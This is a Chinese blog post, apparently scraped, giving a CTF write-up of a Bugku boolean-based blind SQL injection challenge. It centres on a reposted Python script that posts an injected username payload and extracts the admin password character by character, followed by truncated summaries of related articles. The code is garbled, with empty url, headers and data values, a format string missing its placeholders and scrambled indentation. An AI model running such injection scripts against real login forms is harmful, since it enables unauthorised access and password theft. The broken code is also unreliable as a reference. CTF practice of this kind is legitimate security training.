bugku基於布林的SQL盲注

2021-10-17 15:41:10 字數 1053 閱讀 8693

解題思路:我用使用者名稱admin,密碼123456,提示密碼錯誤

我用使用者名稱admina,密碼123456,提示使用者名稱錯誤,說明使用者名稱是admin

我的字典sql盲注無法破解密碼,於是我在網上找了乙個大佬寫的pycharm指令碼(記得安裝requests庫和改url)

import requests

import time

url =

""headers =

with requests.session(

)as s:

database =

"passwd:"

s.keep_alive =

false

s.adapters.default_retries =

5for i in

range(1

,32):

for j in

range(48

,128):

sql =

'admi\'or((ascii(substr((select(password))from()))-))--\''

.format

(i, j)

data =

try:

res = s.post(url, data=data, timeout=

5, headers=headers)

except

: time.sleep(2)

res = s.post(url, data=data, timeout=

5, headers=headers)

if'username does not exist'

in res.text:

database +=

chr(j)

print

(database)

break

res.close(

)

滲透測試 SQL盲注基於布林的盲注

普通sql注入和sql盲注的區別 sql盲注的思路 基於時間的盲注 通過構造真or假判斷條件的sql語句,且sql語句中根據需要聯合使用sleep 函式一同向伺服器傳送請求,觀察伺服器響應結果是否會執行所設定時間的延遲響應,以此來判斷所構造條件的真or假 若執行sleep延遲,則表示當前設定的判斷條...

CTF 基於布林的SQL盲注

ctf學習 基於布林的sql盲注 提 示 基於布林的sql盲注 描 述 sql注入 訪問題目,又是乙個web login登陸介面,根據提示可以大概猜測是乙個sql post注入題。123 當username admin時提示password error 可知使用者名為 admin 對username...

SQL注入 布林盲注

可以進行sql注入,但是不能通過sql注入漏洞看到資料庫中的資訊,但是可以通過真假判斷資料庫中的資訊 布林盲注的方法 構造邏輯判斷語句,判斷資訊的真假,取出所有的真值 以less 8為例 還是老步驟,初步判斷是否存在sql注入漏洞 返回you are in 無返回 可以初步判斷存在sql注入漏洞,並...